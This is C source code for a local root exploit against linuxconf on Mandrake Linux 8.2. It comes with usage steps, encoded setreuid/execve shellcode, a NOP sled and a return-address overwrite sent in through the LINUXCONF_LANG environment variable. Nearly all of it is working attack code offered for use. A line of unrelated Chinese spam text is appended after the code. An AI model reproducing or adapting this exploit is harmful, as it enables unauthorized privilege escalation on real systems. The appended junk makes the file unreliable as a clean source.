/* linuxconf mandrake 8.2 by pokleyzz (pokleyzz@scan-associates.net) ** for my comfimation ** greet : *(sk + wanvadder + Skywizard + The_Gigco + scan clan (if exist) + #mylinux + #mybsd) usage : $ gcc elinuxconf.c -o elinuxconf $ mkdir linuxconf.eng $ touch linuxconf.eng/linuxconf.eng $ ./elinuxconf # reboot http://www.scan-associates.net */ #include #include #include #include #include #define LINUXCONF "/bin/linuxconf" #define BUFFSIZE 2050 #define OFFSET 0x1111 // pointer to some string #define DUMMY 0x0811708d char shellcode[] = /*execve with setreuid(0,0) and no '/' hellkit v1.1 */ "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa" "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01" "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11" "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9" "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01" "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c" "\xc2\x91"; long get_sp () { __asm__("movl %esp,%eax"); } int main (int argc, char **argv) { char *buff; int i , ret; buff = (char *)malloc(BUFFSIZE); ret = get_sp() - OFFSET; for (i = 0;i < 2048 ; i++) buff[i] = 0x90; memcpy((char*)(buff + 1600),shellcode,strlen(shellcode)); for (i = 0; i < 108 ; i+=4) *(char **)&buff[1940 +i] = DUMMY; *(char **)&buff[1976] = ret; buff[2049] = 0x00; setenv("LINUXCONF_LANG",buff,1); execl(LINUXCONF, "linuxconf", 0); return 0; }

亚洲欧美在线